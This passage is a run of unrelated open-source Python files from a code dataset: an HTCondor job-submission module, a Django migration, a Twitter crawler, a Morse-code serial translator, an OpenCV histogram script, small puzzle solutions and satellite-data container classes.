False,\n create_parents: bool = False,\n mode: int = 0o666,\n cleanup_after_finish: bool = False,\n ) -> 'Job.Fluid':\n \"\"\"Configure whether and how the job log is captured.\n\n Args:\n capture: If ``True`` the job log is captured and made available\n in ``Result`` instances. 
Subsequent calls may disable\n capturing by setting ``False``.\n path: If not ``None`` the job log is made available at this\n path. Otherwise the implementer may use a temporary file\n or store content in-memory.\n must_not_exist: If ``True`` the execution is considered failed\n if the file already exists before the process is started.\n This is evaluated before the process is started. Only\n considered if ``path`` is not ``None``, as otherwise the\n implementer manages the file.\n create_parents: If ``True`` all parent directories of the file\n are created if non-existent. Directories are created with\n the default mode, disregarding the ``mode`` parameter.\n Only considered if ``path`` is not ``None``.\n mode: Mode bits of the file, see ``os.open()`` for details.\n Only considered when ``path`` is not ``None``.\n cleanup_after_finish: If ``True`` the stdout file is deleted\n when the `finish` lifetime stage is reached. Only\n considered when ``path`` is not ``None``.\n\n Raises:\n ValueError: If the combination of arguments is not valid.\n \"\"\"\n\n if not capture and path is not None:\n raise ValueError('A file path was passed but log is not supposed to be captured')\n\n def f(j: Job) -> None:\n j._log = Job._Log(\n capture = capture,\n path = path,\n must_not_exist = must_not_exist,\n create_parents = create_parents,\n mode = mode,\n cleanup_after_finish = cleanup_after_finish,\n )\n\n return self + f\n\n def __add__(self, other: Callable[['Job'], None]) -> 'Job.Fluid':\n return Job.Fluid._with_stack(self._stack + [other])\n\n def build(self) -> 'Job':\n j = Job()\n for f in self._stack:\n f(j)\n\n j.validate()\n\n return j\n\n @classmethod\n def _with_stack(cls, stack: List[Callable[['Job'], None]]) -> 'Job.Fluid':\n fluid: 'Job.Fluid' = Job.Fluid()\n fluid._stack = stack\n return fluid\n\n\n @dataclass()\n class _Log(object):\n capture: bool = False\n path: Optional[Resolvable[PathType]] = None\n must_not_exist: bool = False\n create_parents: bool = False\n mode: int = 0o666\n cleanup_after_finish: bool = False\n\n\n class WithParams(object):\n def __init__(self, job: 'Job', params: ParamSet) -> None:\n self._job: Job = job\n self._params: ParamSet = params\n\n @property\n def process(self) -> Process.WithParams:\n return self._job.process.with_params(self._params)\n\n @property\n def commands(self) -> Dict[str, str]:\n return {\n key: resolve(value, self._params) for key, value in self._job.commands.items()\n }\n\n @property\n def transfer_files(self) -> bool:\n return resolve(self._job.transfer_files, self._params)\n\n @property\n def log(self) -> Process.Stdout:\n log = self._job.log\n return Process.Stdout(\n capture = log.capture,\n path = None if log.path is None else resolve_abs_path(log.path, self._params),\n must_not_exist = log.must_not_exist,\n create_parents = log.create_parents,\n mode = log.mode,\n cleanup_after_finish = log.cleanup_after_finish,\n )\n\n\n def __init__(self) -> None:\n self._process: Process = Process()\n self._commands: Mapping[str, Resolvable[str]] = {}\n self._transfer_files: Resolvable[bool] = True\n self._log: Job._Log = Job._Log()\n\n def validate(self) -> None:\n self._process.validate()\n\n @property\n def process(self) -> Process:\n return self._process\n\n @property\n def commands(self) -> Mapping[str, Resolvable[str]]:\n return self._commands\n\n @property\n def transfer_files(self) -> Resolvable[bool]:\n return self._transfer_files\n\n @property\n def log(self) -> 'Job._Log':\n return self._log\n\n def with_params(self, params: ParamSet) 
-> 'Job.WithParams':\n return Job.WithParams(self, params)\n\n\nclass Result(ProcessResult):\n def __init__(\n self,\n exit_code: int,\n stdin: Optional[FileAccessor] = None,\n stdout: Optional[FileAccessor] = None,\n stderr: Optional[FileAccessor] = None,\n input_files: Optional[Dict[str, FileAccessor]] = None,\n output_files: Optional[Dict[str, FileAccessor]] = None,\n log: Optional[FileAccessor] = None,\n ) -> None:\n super(Result, self).__init__(\n exit_code = exit_code,\n stdin = stdin,\n stdout = stdout,\n stderr = stderr,\n input_files = input_files,\n output_files = output_files,\n )\n self._log: Optional[FileAccessor] = log\n\n @property\n def log(self) -> FileAccessor:\n if self._log is None:\n raise Exception(f'Log was not captured.')\n return self._log\n\n\nclass HTCondor(Processor[Result]):\n \"\"\"HTCondor performs Process executions through HTCondor's schedd.\n\n Args:\n schedd: :obj:`Schedd` instance to use for submitting jobs and querying their state.\n temp_dir: Directory in which temporary files and links are created while processing. If\n unset, the configuration option of the same name is used. The system default as\n determined by :func:`gettempdir` (e.g. ``/tmp``) is used if the configuration option is\n not set.\n\n Configuration Options:\n\n * ``temp_dir``: Directory in which temporary files and links are created while processing.\n\n Todo:\n * Additional arguments (config, constructor):\n Default commands for jobs?\n \"\"\"\n\n def __init__(\n self,\n schedd: Optional[Schedd] = None,\n temp_dir: Optional[str] = None,\n ) -> None:\n super(HTCondor, self).__init__()\n self._schedd: Schedd = schedd if schedd is not None else Schedd()\n self._temp_dir: str = self._temp_dir_value(temp_dir)\n\n self._cleanup_handlers: HandlersList = HandlersList()\n\n def _temp_dir_value(self, temp_dir: Optional[str]) -> str:\n if temp_dir is not None:\n return temp_dir\n if 'temp_dir' in config[HTCondor]:\n return cast(str, config[HTCondor]['temp_dir'])\n return gettempdir()\n\n def __exit__(self, *args: Any) -> Optional[bool]:\n self._cleanup_handlers()\n self._cleanup_handlers.clear()\n\n return None\n\n def process(\n self, runnable: Any, params_it: Iterable[ParamSet],\n ) -> Iterator[Tuple[ParamSet, Result]]:\n job: Job\n if isinstance(runnable, Process):\n job = Job.Fluid().process(runnable).build()\n elif isinstance(runnable, Job):\n job = runnable\n else:\n raise Exception(f'{self.__class__.__name__} only supports Job and Process runnables')\n\n return self._run_job(job, params_it)\n\n def _run_job(self, job: Job, params_it: Iterable[ParamSet]) -> Iterator[Tuple[ParamSet, Result]]:\n # TODO: introduce public API of Process to get working_directory\n if job.process._working_directory is not None:\n raise Exception('HTCondor does not support setting the working_directory on Process')\n\n with ExitStack() as stack:\n cluster_generator = _JobClusterGenerator(self, job, params_it)\n stack.enter_context(cluster_generator)\n\n submit = Submit()\n\n with self._schedd.transaction() as txn:\n submit_result = submit.queue_with_itemdata(txn, itemdata=iter(cluster_generator))\n\n stack.callback(\n self._schedd.act, JobAction.Remove, f'ClusterId == {submit_result.cluster()}',\n )\n\n job_states: Dict[int, _JobState] = {}\n\n for sleep_time in _get_poll_sleep_times():\n sleep(sleep_time)\n\n query_result = self._schedd.xquery(\n requirements = f'ClusterId == {submit_result.cluster()}',\n projection = _JobState.projection(),\n )\n\n job_states.clear()\n for job_state_ad in query_result:\n 
job_state = _JobState.from_class_ad(job_state_ad)\n job_states[job_state.proc_id] = job_state\n\n counts = _StatusCounts()\n counts.add_jobs(job_states.values())\n\n print(counts)\n\n if counts.completed == counts.total:\n break\n\n results: List[Tuple[ParamSet, Result]] = []\n for proc_id, process in enumerate(cluster_generator.processes):\n job_state = job_states[proc_id]\n if job_state.exit_by_signal:\n raise _ProcessFailedError(\n f'Process exited due to receiving signal {job_state.exit_signal}',\n )\n if job_state.exit_code is None:\n raise Exception('Exit code received from HTCondor is None')\n\n result = process.result(job_state.exit_code)\n self._check_for_failure(job, result, process.params)\n results.append((process.params, result))\n\n self._cleanup_handlers += cluster_generator.cleanup_handlers\n\n return iter(results)\n\n def _check_for_failure(self, job: Job, result: Result, params: ParamSet) -> None:\n failure_mode = job.with_params(params).process.failure_mode\n\n if failure_mode.interpret_exit_code is not None:\n if failure_mode.interpret_exit_code(result.exit_code):\n raise _ProcessFailedError(f'Exit code {result.exit_code} interpreted as failure')\n if failure_mode.interpret_stderr is not None:\n if failure_mode.interpret_stderr(result.stderr):\n raise _ProcessFailedError(f'Stderr interpreted as failure')\n if failure_mode.interpret_stdout is not None:\n if failure_mode.interpret_stdout(result.stdout):\n raise _ProcessFailedError(f'Stdout interpreted as failure')\n\n\nclass _JobClusterGenerator(object):\n @dataclass\n class _ProcessInfo(object):\n params: ParamSet\n stdin: Optional[FileDescriptor] = None\n stdout: Optional[FileDescriptor] = None\n stderr: Optional[FileDescriptor] = None\n log: Optional[FileDescriptor] = None\n input_files: List[FileDescriptor] = field(default_factory=list)\n output_files: List[FileDescriptor] = field(default_factory=list)\n\n def result(self, exit_code: int) -> Result:\n return Result(\n exit_code,\n stdin = self.stdin.accessor() if self.stdin is not None else None,\n stdout = self.stdout.accessor() if self.stdout is not None else None,\n stderr = self.stderr.accessor() if self.stderr is not None else None,\n log = self.log.accessor() if self.log is not None else None,\n input_files = {\n file.name: file.accessor() for file in self.input_files\n },\n output_files = {\n file.name: file.accessor() for file in self.output_files\n },\n )\n\n def __init__(self, htcondor: HTCondor, job: Job, params_it: Iterable[ParamSet]) -> None:\n self._htcondor: HTCondor = htcondor\n self._job: Job = job\n self._params_it: Iterable[ParamSet] = params_it\n\n self._processes: List[_JobClusterGenerator._ProcessInfo] = []\n self._cleanup_handlers: HandlersList = HandlersList()\n self._stack: ExitStack = ExitStack()\n\n @property\n def cleanup_handlers(self) -> HandlersList:\n return self._cleanup_handlers\n\n @property\n def processes(self) -> 'List[_JobClusterGenerator._ProcessInfo]':\n return self._processes\n\n def __enter__(self) -> '_JobClusterGenerator':\n self._stack.__enter__()\n self._stack.enter_context(CallbackOnException(self._cleanup_handlers))\n return self\n\n def __exit__(\n self,\n exc_type: Optional[Type[BaseException]] = None,\n exc_val: Optional[BaseException] = None,\n exc_tb: Optional[TracebackType] = None,\n ) -> Optional[bool]:\n return self._stack.__exit__(exc_type, exc_val, exc_tb)\n\n def __iter__(self) -> Iterator[Dict[str, str]]:\n for params in self._params_it:\n try:\n job = self._job.with_params(params)\n info = 
_JobClusterGenerator._ProcessInfo(params)\n\n data: Dict[str, str] = {}\n\n if job.transfer_files:\n file_params = self._prepare_all_files_for_transfer(job, data, info)\n else:\n file_params = self._prepare_all_files_for_no_transfer(job, data, info)\n\n job = self._job.with_params(ChainMap(file_params, params))\n\n data.update(\n universe = 'vanilla',\n executable = _lookup_cmd(job.process.cmd),\n arguments = _args_to_str(job.process.args),\n environment = _environment_to_str(job.process.environment),\n leave_in_queue = 'JobStatus != 3',\n )\n\n data.update(job.commands)\n\n except BaseException as e:\n # Ensure that at least one element has been yielded as the\n # htcondor Python bindings seg fault otherwise. See #7609.\n # https://htcondor-wiki.cs.wisc.edu/index.cgi/tktview?tn=7609\n yield {'executable': '/bin/ls'}\n raise e\n\n self._processes.append(info)\n\n print(data)\n\n yield data\n\n def _prepare_all_files_for_transfer(\n self,\n job: Job.WithParams,\n data: Dict[str, str],\n info: '_JobClusterGenerator._ProcessInfo',\n ) -> Dict[str, str]:\n self._prepare_std_files(job, data, info)\n\n info.input_files = [\n self._prepare_input_file_for_transfer(spec) for spec in job.process.input_files\n ]\n\n info.output_files = [\n self._prepare_output_file_for_transfer(spec) for spec in job.process.output_files\n ]\n\n data.update(\n should_transfer_files = 'YES',\n transfer_executable = 'True',\n transfer_input = 'True',\n transfer_output = 'True',\n transfer_error = 'True',\n transfer_input_files = _files_to_str(\n _path_to_str(file.process_path) for file in info.input_files\n ),\n transfer_output_files = _files_to_str(\n _path_to_str(os.path.basename(file.process_path)) for file in info.output_files\n ),\n transfer_output_remaps = _file_remaps_to_str({\n _path_to_str(os.path.basename(file.process_path)): _path_to_str(file.open_path)\n for file in info.output_files\n }),\n when_to_transfer_output = 'ON_EXIT',\n )\n\n all_file_descriptors = itertools.chain(info.input_files, info.output_files)\n return {\n f'__file_{file.name}': _path_to_str(os.path.basename(file.process_path))\n for file in all_file_descriptors\n }\n\n def _prepare_all_files_for_no_transfer(\n self,\n job: Job.WithParams,\n data: Dict[str, str],\n info: '_JobClusterGenerator._ProcessInfo',\n ) -> Dict[str, str]:\n self._prepare_std_files(job, data, info)\n\n temp_dir = self._htcondor._temp_dir\n\n info.input_files = [\n prepare_input_file(spec, self._stack, self._cleanup_handlers, temp_dir=temp_dir)\n for spec in job.process.input_files\n ]\n\n info.output_files = [\n prepare_output_file(spec, self._stack, self._cleanup_handlers, temp_dir=temp_dir)\n for spec in job.process.output_files\n ]\n\n data.update(\n should_transfer_files = 'NO',\n transfer_executable = 'False',\n transfer_input = 'False',\n transfer_output = 'False',\n transfer_error = 'False',\n )\n\n all_file_descriptors = itertools.chain(info.input_files, info.output_files)\n return {\n f'__file_{file.name}': _path_to_str(file.process_path) for file in all_file_descriptors\n }\n\n def _prepare_std_files(\n self,\n job: Job.WithParams,\n data: Dict[str, str],\n info: '_JobClusterGenerator._ProcessInfo',\n ) -> None:\n temp_dir = self._htcondor._temp_dir\n if job.process.stdin.connected:\n info.stdin = stdin = prepare_input_file(\n job.process.stdin, self._stack, self._cleanup_handlers, name='stdin',\n temp_dir=temp_dir,\n )\n data['input'] = _path_to_str(info.stdin.open_path)\n if job.process.stdout.capture:\n info.stdout = prepare_output_file(\n 
job.process.stdout, self._stack, self._cleanup_handlers, name='stdout',\n temp_dir=temp_dir,\n )\n data['output'] = _path_to_str(info.stdout.open_path)\n if job.process.stderr.capture:\n info.stderr = prepare_output_file(\n job.process.stderr, self._stack, self._cleanup_handlers, name='stderr',\n temp_dir=temp_dir,\n )\n data['error'] = _path_to_str(info.stderr.open_path)\n if job.log.capture:\n info.log = prepare_output_file(\n job.log, self._stack, self._cleanup_handlers, name='log',\n temp_dir=temp_dir,\n )\n data['log'] = _path_to_str(info.log.open_path)\n\n def _prepare_input_file_for_transfer(self, spec: Process.InputFile) -> FileDescriptor:\n temp_dir = self._htcondor._temp_dir\n desc = prepare_input_file(spec, self._stack, self._cleanup_handlers, temp_dir=temp_dir)\n if not desc.temporary:\n if isinstance(desc.open_path, str):\n link_path = _make_temp_link(desc.open_path, temp_dir)\n elif isinstance(desc.open_path, bytes):\n link_path = _make_temp_link(_path_to_str(desc.open_path), temp_dir)\n self._stack.callback(os.unlink, link_path)\n desc = replace(desc, process_path=link_path)\n return desc\n\n def _prepare_output_file_for_transfer(self, spec: Process.OutputFile) -> FileDescriptor:\n temp_dir = self._htcondor._temp_dir\n desc = prepare_output_file(spec, self._stack, self._cleanup_handlers, temp_dir=temp_dir)\n if not desc.temporary:\n fd, file_path = mkstemp(dir=temp_dir)\n os.close(fd)\n self._stack.callback(os.unlink, file_path)\n desc = replace(desc, process_path=file_path)\n return desc\n\n\ndef _lookup_cmd(cmd: str) -> str:\n cmd_path = cmd if os.path.isabs(cmd) else which(cmd)\n if cmd_path is None:\n raise Exception(f'Failed to locate (\"which\") command {cmd!r}')\n return cmd_path\n\ndef _rand_name_it(length: int=8) -> Iterator[str]:\n c = 'abcdefghijklmnopqrstuvwxyz0123456789_'\n random = Random()\n\n return (''.join(random.choice(c) for _ in range(length)) for _ in itertools.repeat(None))\n\ndef _make_temp_link(\n orig: AnyStr,\n dir: AnyStr,\n prefix: Optional[AnyStr] = None,\n suffix: Optional[AnyStr] = None,\n) -> AnyStr:\n \"\"\"Creates a symlink using a mechanism suitable for a temporary directory.\n\n The function behaves safely in concurrent scenarios: The ``symlink``\n syscall atomically creates a symlink or fails. 
Many random names are tried\n before raising an exception if an existing files with the randomised name\n is discovered.\n\n Adapted from the Python standard library, dropped Windows special case.\n https://github.com/python/cpython/blob/e65b3fa9f16537d20f5f37c25673ac899fcd7099/Lib/tempfile.py#L247\n\n Args:\n orig: Path which the symlink should point to.\n dir: Directory in which the symlink should be created.\n prefix: Prefix before the random part of the symlink.\n suffix: Suffix after the random part of the symlink.\n \"\"\"\n\n names: Iterator[AnyStr]\n pre: AnyStr\n suf: AnyStr\n if isinstance(orig, bytes):\n names = map(os.fsencode, _rand_name_it())\n pre = prefix if prefix is not None else os.fsencode('')\n suf = suffix if suffix is not None else os.fsencode('')\n else:\n names = _rand_name_it()\n pre = prefix if prefix is not None else ''\n suf = suffix if suffix is not None else ''\n\n files = map(lambda n: os.path.join(dir, pre + n + suf), names)\n\n for file, _ in zip(files, range(TMP_MAX)):\n try:\n os.symlink(orig, file)\n except FileExistsError:\n continue\n\n return os.path.abspath(file)\n\n raise FileExistsError(errno.EEXIST, 'No usable temporary file name found')\n","repo_name":"pskopnik/bjec","sub_path":"src/bjec/htcondor.py","file_name":"htcondor.py","file_ext":"py","file_size_in_byte":39976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"46762807284","text":"def fibonacci(n):\n if n == 0: # return 0 as it is\n return 0\n elif n == 1: # return 1 as it is\n return 1\n else:\n return fibonacci(n-1) + fibonacci(n-2) # Calculate and return the nth number in the Fibonacci sequence\n\nn = int(input(\"Enter a number: \"))\nfor i in range(n):\n print(fibonacci(i), end=' ')\nprint()\n","repo_name":"AlmightyNan/math","sub_path":"fibonacci sequences/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21564084254","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Answer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('answer', models.TextField(verbose_name='answer')),\n ('date_answered', models.DateTimeField(verbose_name='date answered')),\n ],\n ),\n migrations.CreateModel(\n name='Question',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('question', models.TextField(verbose_name='question')),\n ('date_posted', models.DateTimeField(verbose_name='date posted')),\n ],\n ),\n migrations.AddField(\n model_name='answer',\n name='question',\n field=models.ForeignKey(to='quorahome.Question'),\n ),\n ]\n","repo_name":"Luciekimotho/Quora","sub_path":"quorahome/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"98129130","text":"import sys\nimport bisect\nr=sys.stdin.readline\nN=int(r())\nk=int(r())\nans=0\ndef solution(num,N):\n if num==1:\n return 1\n elif num==N**2:\n return N**2\n else:\n LR=[1,N]\n cnt=0\n for i in range(1,N+1):\n L,R=LR[0]*i,LR[1]*i\n if num3 and mid%3!=0:\n while mid%3!=0:\n mid+=1\n 
tmp=solution(mid,N)\n    if tmp==k or hi==mid or lo==mid:\n        break\n    elif k 50 :\n        cw_string += "/"\n    elif int(beep) == 0 and len(beep) > 12 :\n        cw_string += " "\n    elif int(beep) != 0 and len(beep) > 20 :\n        cw_string += "END"\n    elif int(beep) != 0 and len(beep) > 5 :\n        cw_string += '-'\n    elif int(beep) !=0 and len(beep) > 1 :\n        cw_string += '.'\n\nprint('CW string generated: ', cw_string)\n\ntranslated_words = CW_translate(cw_string)\ntranslation = ""\n\nfor word in translated_words:\n    translation += word\n    translation += ' '\n    \nprint('translation: ', translation.capitalize())\n\n# Close serial port\nser.close()\n","repo_name":"yrsci/morse-arduino","sub_path":"python_morse_translator.py","file_name":"python_morse_translator.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"20307959349","text":"import json\nimport os\nimport sys\nfrom twarc import Twarc\nfrom constants import *\n\ndef newTweet():\n    tweet = {\n        "id": "",\n        "favorite_count": "",\n        "full_text": "",\n        "is_quote_status": "",\n        "is_retweet": "",\n        "quoted_status_id": "",\n        "retweet_count": "",\n        "retweeted_status_id": "",\n        "user_id": "",\n        "lang": "",\n        "created_at": "",\n    }\n    return tweet\n\n\nif __name__ == '__main__':\n    if not os.path.exists(DATA_DIR):\n        os.makedirs(DATA_DIR)\n    with open(TWEET_DATAFILE, "w") as f:\n        json.dump([], f)\n    tweets = []\n    users = set()\n    count = 0\n    for tweet in twarc.search("trump", max_id=928149460303020032):\n        count += 1\n        tw = newTweet()\n        for attr in tw:\n            tw[attr] = tweet.get(attr)\n        tw["user_id"] = tweet["user"]["id"]\n        users.add(tweet["user"]["id"])\n        if tweet.get("retweeted_status"):\n            tw["is_retweet"] = True\n            tw["retweeted_status_id"] = tweet["retweeted_status"]["id"]\n            tw["retweet_count"] = 0\n        tweets.append(tw)\n        if count%(max(10, TWEETS_TO_CRAWL/1000)) == 0:\n            with open(TWEET_DATAFILE) as f:\n                data = json.load(f);\n            data += tweets\n            tweets = []\n            with open(TWEET_DATAFILE, 'w') as f:\n                json.dump(data, f, indent=2)\n            sys.stdout.write('\r')\n            sys.stdout.write('{} tweets searched'.format(count))\n            sys.stdout.flush()\n        if count == TWEETS_TO_CRAWL:\n            break\n","repo_name":"maulik96/IR-twitter-user-authenticity","sub_path":"src/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"}
+{"seq_id":"32278800880","text":"my_dict = {\r\n    "1": "one",\r\n    "2": "two",\r\n    "3": "three",\r\n    "4": "four",\r\n    "5": "five",\r\n    "6": "six",\r\n    "7": "seven",\r\n    "8": "eight",\r\n    "9": "nine",\r\n    "10": "ten",\r\n    "11": "eleven",\r\n    "12": "twelve",\r\n    "13": "thirteen",\r\n    "14": "fourteen",\r\n    "15": "fifteen",\r\n    "16": "sixteen",\r\n    "17": "seventeen",\r\n    "18": "eighteen",\r\n    "19": "nineteen",\r\n    "20": "twenty",\r\n    "30": "thirty",\r\n    "40": "forty",\r\n    "50": "fifty",\r\n    "60": "sixty",\r\n    "70": "seventy",\r\n    "80": "eighty",\r\n    "90": "ninety"\r\n}\r\n# How to read each number\r\ndef translate(n):\r\n    result = ""\r\n    if n != 0:\r\n        a = n//100\r\n        n = n - a*100\r\n        c = n % 10\r\n        b = n - c\r\n        if a != 0:\r\n            a = str(a)\r\n            result += my_dict[a] + "hundred"\r\n        if b > 10:\r\n            result += "and"\r\n            b = str(b)\r\n            result += my_dict[b]\r\n            if c != 0:\r\n                c = str(c)\r\n                result += my_dict[c]\r\n        elif b == 0:\r\n            if c != 0:\r\n                result += "and"\r\n                c = str(c)\r\n                result += my_dict[c]\r\n        else:\r\n            result += "and"\r\n            if c == 0 :\r\n                result += "ten"\r\n            else:\r\n                d = str(b+c)\r\n                result += my_dict[d]\r\n    return len(result)\r\n\r\ntotal = 0\r\nfor i in range(1,1000):\r\n    total += translate(i)\r\ntotal += 11 - 3*99\r\nprint (total)","repo_name":"pratyaydeep/Python-programs","sub_path":"ProjectEuler/Problem17_ProjectEuler.py","file_name":"Problem17_ProjectEuler.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"41139975521","text":"#!/usr/bin/python3\n# part of https://github.com/WolfgangFahl/play-chess-with-a-webcam\n\n'''\nCreated on 2019-11-29\n\n@author: wf\n\nsee https://docs.opencv.org/master/d1/db7/tutorial_py_histogram_begins.html\n'''\nimport sys\nimport cv2\nfrom matplotlib import pyplot as plt\nfrom timeit import default_timer as timer\n\nclass Histogram:\n    """ Image Histogram """\n    color = ('blue','green','red')\n    \n    def __init__(self,image):\n        self.hist={}\n        self.image=image\n        self.rgb=cv2.cvtColor(self.image, cv2.COLOR_BGR2RGB)\n        \n        start=timer()\n        for i in range(len(Histogram.color)):\n            self.hist[i] = cv2.calcHist([image],[i],None,[256],[0,256])\n        end=timer()\n        self.time=end-start\n    \n    def plot(self): \n        fig,(ax1,ax2)=plt.subplots(1,2)\n        fig.suptitle('color histogram', fontsize=20)\n        ax1.imshow(self.rgb), ax1.axis('off')\n        for i,col in enumerate(Histogram.color):\n            ax2.plot(self.hist[i],color = col)\n            #ax2.xlim([0,256])\n        plt.show()\n\ndef main(argv):\n    default_file = '../../testMedia/chessBoard013.jpg'\n    filename = argv[0] if len(argv) > 0 else default_file\n    image = cv2.imread(filename)\n    #cv2.imshow('chessboard', image)\n    # refresh\n    #cv2.waitKey(10)\n    h=Histogram(image)\n    h.plot()\n\nif __name__ == "__main__":\n    main(sys.argv[1:])","repo_name":"WolfgangFahl/play-chess-with-a-webcam","sub_path":"examples/opencv/histogram2.py","file_name":"histogram2.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"27"}
+{"seq_id":"13740012309","text":"import numpy as np\nimport h5py\nfrom atrain_match.utils.common import write_match_objects\n\n\nclass DataObject(object):\n    """\n    Class to handle data objects with several arrays.\n\n    """\n\n    def __getattr__(self, name):\n        try:\n            return self.all_arrays[name]\n        except KeyError:\n            raise AttributeError("%s instance has no attribute '%s'" % (\n                self.__class__.__name__, name))\n\n    def __setattr__(self, name, value):\n        if name == 'all_arrays':\n            object.__setattr__(self, name, value)\n        else:\n            self.all_arrays[name] = value\n\n    def __add__(self, other):\n        """Adding two objects together"""\n        # Check if we have an empty object\n        # modis objects do not have a longitude attribute\n        is_empty_self = True\n        is_empty_other = True\n        for key in self.all_arrays.keys():\n            if self.all_arrays[key] is not None and len(self.all_arrays[key]) > 0:\n                is_empty_self = False\n        for key in other.all_arrays.keys():\n            if other.all_arrays[key] is not None and len(other.all_arrays[key]) > 0:\n                is_empty_other = False\n        if is_empty_self:\n            # print("First object is None!, returning second object")\n            return other\n        if is_empty_other:\n            # print("Second object is None!, returning first object")\n            return self\n        for key in self.all_arrays:\n            try:\n                if self.all_arrays[key].ndim != other.all_arrays[key].ndim:\n                    raise ValueError("Can't concatenate arrays " +\n                                     "of different dimensions!")\n            except AttributeError:\n                # print "Don't concatenate member " + key + "... " + str(e)\n                self.all_arrays[key] = other.all_arrays[key]\n                continue\n            try:\n                if self.all_arrays[key].ndim == 1:\n                    self.all_arrays[key] = np.concatenate(\n                        [self.all_arrays[key],\n                         other.all_arrays[key]])\n                elif key in ['segment_nwp_geoheight',\n                             'segment_nwp_moist',\n                             'segment_nwp_pressure',\n                             'segment_nwp_temp']:\n                    self.all_arrays[key] = np.concatenate(\n                        [self.all_arrays[key],\n                         other.all_arrays[key]], 0)\n                elif self.all_arrays[key].ndim == 2:\n                    self.all_arrays[key] = np.concatenate(\n                        [self.all_arrays[key],\n                         other.all_arrays[key]], 0)\n            except ValueError:\n                # print "Don't concatenate member " + key + "... " + str(e)\n                self.all_arrays[key] = other.all_arrays[key]\n        return self\n\n    def extract_elements(self, idx=None, starti=0, endi=0):\n        """Extract elements with index idx"""\n        # to replace calipso_track_from_matched\n\n        for key, value in self.all_arrays.items():\n            if key in ["TAI_start"]:\n                continue\n            if value is None:\n                self.all_arrays[key] = None\n            elif value.size == 1:\n                pass\n            elif idx is not None:\n                self.all_arrays[key] = value[idx.ravel(), ...]\n            else:\n                self.all_arrays[key] = value[starti:endi, ...]\n            if value is not None and len(value.shape) > 1 and value.shape[1] == 1:\n                self.all_arrays[key] = self.all_arrays[key].ravel()\n\n        return self\n\n    def mask_nodata(self, nodata):\n        for key in self.all_arrays:\n            if key in ['latitude']:\n                pass\n            else:\n                try:\n                    self.all_arrays[key] = np.ma.array(\n                        self.all_arrays[key],\n                        mask=self.all_arrays[key] <= nodata)\n                except Exception:\n                    print("could not mask %s" % (key))\n\n\nclass ExtractedImagerObject(DataObject):\n    def __init__(self):\n        DataObject.__init__(self)\n        self.all_arrays = {\n            'imager_ctth_m_above_seasurface': None,\n            'longitude': None,\n            'latitude': None,\n            'sec_1970': None,\n            'ctth_height': None,\n            'ctth_pressure': None,\n            'ctth_temperature': None,\n            'cloudtype': None,\n            'cloudmask': None,\n            'cfc_mean': None,\n            'cma_prob': None,\n            'cma_prob_mean': None,\n            'cpp_iwp': None,\n            'cpp_lwp': None,\n            'cpp_phase': None,\n            'cpp_cer': None,\n            # Quality flags\n            'cloudtype_qflag': None,\n            'cloudtype_phaseflag': None,\n            'cloudtype_quality': None,\n            'cloudtype_conditions': None,\n            'cloudtype_status': None,\n            'ctth_status': None,\n            # Angles\n            'satz': None,\n            'sunz': None,\n            # Uncertainties\n            'cma_unc': None,\n            'cph_unc': None,\n            'cth_unc': None,\n            'ctp_unc': None,\n            'ctt_unc': None,\n            'cwp_unc': None\n        }\n\n\nclass ModisObject(DataObject):\n    def __init__(self):\n        DataObject.__init__(self)\n        self.all_arrays = {\n            'height': None,\n            'temperature': None,\n            'pressure': None,\n            'cloud_emissivity': None,\n            'cloud_phase': None,\n            'lwp': None}\n\n\nclass ExtraObject(DataObject):\n    def __init__(self):\n        DataObject.__init__(self)\n        self.all_arrays = {\n            'name': None}\n\n\nclass CalipsoObject(DataObject):\n    def __init__(self):\n        DataObject.__init__(self)\n        self.all_arrays = {\n            # Normal name = calipso.name.lower()\n\n            # Imager matching needed for all truths:\n            'longitude': None,\n            'latitude': None,\n            'imager_linnum': None,\n            'imager_pixnum': None,\n            'elevation': None, # DEM_elevation => elevation in (m)"\n            'cloud_fraction': None,\n            'validation_height': None,\n            'sec_1970': None,\n            'minimum_laser_energy_532': None,\n            'layer_top_altitude': None,\n            'layer_top_temperature': None,\n            'layer_top_pressure': None,\n            'midlayer_temperature': None,\n            'layer_base_altitude': None,\n            'layer_base_pressure': None,\n            'number_layers_found': None,\n            'igbp_surface_type': None,\n            
